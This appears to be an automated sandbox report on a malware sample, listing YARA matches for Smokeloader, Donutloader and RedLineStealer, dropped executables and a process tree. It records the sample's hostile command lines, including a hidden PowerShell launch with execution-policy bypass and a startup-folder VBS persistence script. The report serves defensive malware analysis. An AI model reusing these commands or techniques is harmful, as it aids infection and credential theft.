Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7516 -s 1536

Source: MyProg.exe.5.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: B552.exe.14.dr

Static PE information: Number of sections : 12 > 10

Source: 753F.exe.14.dr	Static PE information: No import functions for PE file found
Source: F6D9.exe.14.dr	Static PE information: No import functions for PE file found

Source: 7Y18r(14).exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 37.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 43.2.vm.exe.28c0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 37.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 43.2.vm.exe.28c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 00000004.00000002.1462369187.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000025.00000002.3741871434.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000002B.00000002.2935972956.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000026.00000002.2904757056.0000000003870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000004.00000002.1462544798.0000000000660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000010.00000002.1780544287.0000000002131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.1462755251.00000000006DE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000010.00000002.1780411113.0000000000680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000010.00000002.1780256705.000000000050D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000026.00000002.2881701412.0000000000060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000010.00000002.1780382606.0000000000670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.1462616334.0000000000681000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0000002B.00000002.2872562883.0000000000480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: IXDaI.exe.4.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: 7Y18r(14).exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: IXDaI.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ftejced.14.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: IXDaI.exe.4.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: 37.2.vm.exe.4e40000.1.raw.unpack, Settings.cs	Base64 encoded string: 'uv876R64GyPQROS6Pcq+tT2rujm6QhOA2jKz3+72iK0vssZ7tRu9W1NfcaQ5yk3K4leNInPIlyvrm/sWNe6YUSzW9MnjujJ8wA3fVO6kqY4=', 'tBbcnyqIuxWvE/Aa008Phm66l0gx08l3V72N0uezc1BvWV+aVFh/K2LjDSmziiX4d1we58iQkTKHp5hlA6J3ArDNNUTcH31I6D+8IIWmVEXPfFcr7grctRvtFWbh8/WW', 'vlrU2ttL4QCN9XP+miA1iO2Zi1Qo5KKeTfPUgLmvXsgl1b/ZXBNeN/RykY5FXUbGAFb/hcKmdGI2lxq9dyDNOg==', 'jajjt4fLdfeySHLjOUN+WU7vKFN/tv6flHwdN63QqNLvwdiPerPjqi8pJYhlDxutlcONhE6KmVeSyHLXzp1X0ivMLOia3ounzEFu+OufC35pSXOr0AgnutA9Hm2WMXLR5SrKu9Ep2d9bPbB7jBc3VXBVjkPHm+BjMjy64M6HAubGgc8bZ4x9RmkpsgBYOzwKBmFDp7rKGTxhnrnem674/IV8HtJhbUivlbelAfQbN92NlB/IZHSII0WCgZyWHfjXPeAh7ScQvm1glooPfQyjEFujB5EgoLg8/Q+UZ9OyLZY=', '/3HMGRMO5mfkdekqR4Zafv717iumQMzpVLF6A9pHRaBxVKyvDxb55/QnfojY3GM4MZFgEKqs9lZExa/oUaQFQQ==', 'l439UHfThXI7Tvv4tLPkRk4LgJxneAQ3SRt6rij4oIvNCNJh0dGkWYtmoBCaQASy+UxakX8pDIHBYYo6I0jgiA==', 'H36CdwWLE8twm6SaEVP4wCqEXttEdFNm1/TG0CIbxJ6QscVZsS9u+iDyyURaAEJfbnGnfKxPezH51YuRdKUEGw==', 'X+lWHHhlIbk/ipVH2n6hOx1tpa9s2D5Jo0CwgGIgu5WBtb6gmcLOKhvfywa/wW2BsaqNON/3eZUEUOX0Z6TMoQ=='
Source: 43.2.vm.exe.28c0000.1.raw.unpack, Settings.cs	Base64 encoded string: 'uv876R64GyPQROS6Pcq+tT2rujm6QhOA2jKz3+72iK0vssZ7tRu9W1NfcaQ5yk3K4leNInPIlyvrm/sWNe6YUSzW9MnjujJ8wA3fVO6kqY4=', 'tBbcnyqIuxWvE/Aa008Phm66l0gx08l3V72N0uezc1BvWV+aVFh/K2LjDSmziiX4d1we58iQkTKHp5hlA6J3ArDNNUTcH31I6D+8IIWmVEXPfFcr7grctRvtFWbh8/WW', 'vlrU2ttL4QCN9XP+miA1iO2Zi1Qo5KKeTfPUgLmvXsgl1b/ZXBNeN/RykY5FXUbGAFb/hcKmdGI2lxq9dyDNOg==', 'jajjt4fLdfeySHLjOUN+WU7vKFN/tv6flHwdN63QqNLvwdiPerPjqi8pJYhlDxutlcONhE6KmVeSyHLXzp1X0ivMLOia3ounzEFu+OufC35pSXOr0AgnutA9Hm2WMXLR5SrKu9Ep2d9bPbB7jBc3VXBVjkPHm+BjMjy64M6HAubGgc8bZ4x9RmkpsgBYOzwKBmFDp7rKGTxhnrnem674/IV8HtJhbUivlbelAfQbN92NlB/IZHSII0WCgZyWHfjXPeAh7ScQvm1glooPfQyjEFujB5EgoLg8/Q+UZ9OyLZY=', '/3HMGRMO5mfkdekqR4Zafv717iumQMzpVLF6A9pHRaBxVKyvDxb55/QnfojY3GM4MZFgEKqs9lZExa/oUaQFQQ==', 'l439UHfThXI7Tvv4tLPkRk4LgJxneAQ3SRt6rij4oIvNCNJh0dGkWYtmoBCaQASy+UxakX8pDIHBYYo6I0jgiA==', 'H36CdwWLE8twm6SaEVP4wCqEXttEdFNm1/TG0CIbxJ6QscVZsS9u+iDyyURaAEJfbnGnfKxPezH51YuRdKUEGw==', 'X+lWHHhlIbk/ipVH2n6hOx1tpa9s2D5Jo0CwgGIgu5WBtb6gmcLOKhvfywa/wW2BsaqNON/3eZUEUOX0Z6TMoQ=='

Source: 43.2.vm.exe.28c0000.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 43.2.vm.exe.28c0000.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 753F.exe.14.dr, PowerShellLoader.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 753F.exe.14.dr, PowerShellLoader.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 37.2.vm.exe.4e40000.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 37.2.vm.exe.4e40000.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@53/68@18/17

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 5_2_00BA119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,	5_2_00BA119F
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 17_2_00EE119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,	17_2_00EE119F
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Code function: 24_2_00007FF70B93F5B0 LookupPrivilegeValueA,AdjustTokenPrivileges,OpenProcessToken,	24_2_00007FF70B93F5B0

Source: C:\Users\user\Desktop\7Y18r(14).exe

Code function: 4_2_006E0D11 CreateToolhelp32Snapshot,Module32First,

4_2_006E0D11

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 31_2_02ED9C80 CoCreateInstance,

31_2_02ED9C80

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k1[1].rar

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Mutant created: \Sessions\1\BaseNamedObjects\8yUscnjrUY
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3656:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5860:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3852:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7864
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Mutant created: \Sessions\1\BaseNamedObjects\aqswvfsywrpgi
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7516
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5776

Source: C:\Users\user\Desktop\7Y18r(14).exe

File created: C:\Users\user\AppData\Local\Temp\IXDaI.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\B552.exe

File opened: C:\Windows\system32\04f50d5bfbb517b12eaa2523a3e51b5ee0f9a4a9a5400f8ac09b57829b5bcf80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7760095b.bat" "

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs"

Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\7Y18r(14).exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: lm.exe, 00000026.00000003.2666645630.0000000003162000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2668070369.0000000003149000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2638557734.000000000315C000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2645191230.000000000313D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 7Y18r(14).exe

ReversingLabs: Detection: 94%

Source: B552.exe	String found in binary or memory: &github.com/filecoin-project/go-address
Source: B552.exe	String found in binary or memory: seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanL
Source: B552.exe	String found in binary or memory: seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanL
Source: B552.exe	String found in binary or memory: eap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listrunti
Source: B552.exe	String found in binary or memory: eap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listrunti

Source: unknown	Process created: C:\Users\user\Desktop\7Y18r(14).exe "C:\Users\user\Desktop\7Y18r(14).exe"
Source: C:\Users\user\Desktop\7Y18r(14).exe	Process created: C:\Users\user\AppData\Local\Temp\IXDaI.exe C:\Users\user\AppData\Local\Temp\IXDaI.exe
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7516 -s 1536
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ftejced C:\Users\user\AppData\Roaming\ftejced
Source: C:\Users\user\AppData\Roaming\ftejced	Process created: C:\Users\user\AppData\Local\Temp\IXDaI.exe C:\Users\user\AppData\Local\Temp\IXDaI.exe
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7760095b.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F6D9.exe C:\Users\user\AppData\Local\Temp\F6D9.exe
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\B552.exe C:\Users\user\AppData\Local\Temp\B552.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\753F.exe C:\Users\user\AppData\Local\Temp\753F.exe
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Process created: C:\Users\user\AppData\Local\Temp\753F.exe "C:\Users\user\AppData\Local\Temp\753F.exe" -HOSTRUNAS
Source: C:\Users\user\AppData\Local\Temp\B552.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe "lm.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5776 -s 1124
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7864 -s 628
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F6D9.exe "C:\Users\user\AppData\Local\Temp\F6D9.exe"
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\7Y18r(14).exe	Process created: C:\Users\user\AppData\Local\Temp\IXDaI.exe C:\Users\user\AppData\Local\Temp\IXDaI.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F6D9.exe C:\Users\user\AppData\Local\Temp\F6D9.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\B552.exe C:\Users\user\AppData\Local\Temp\B552.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\753F.exe C:\Users\user\AppData\Local\Temp\753F.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F6D9.exe "C:\Users\user\AppData\Local\Temp\F6D9.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ftejced	Process created: C:\Users\user\AppData\Local\Temp\IXDaI.exe C:\Users\user\AppData\Local\Temp\IXDaI.exe
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7760095b.bat" "
Source: C:\Users\user\AppData\Local\Temp\B552.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Process created: C:\Users\user\AppData\Local\Temp\753F.exe "C:\Users\user\AppData\Local\Temp\753F.exe" -HOSTRUNAS
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe "lm.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe "vm.exe"

Source: C:\Users\user\Desktop\7Y18r(14).exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7Y18r(14).exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\7Y18r(14).exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\7Y18r(14).exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: iertutil.dll	Jump to behavior
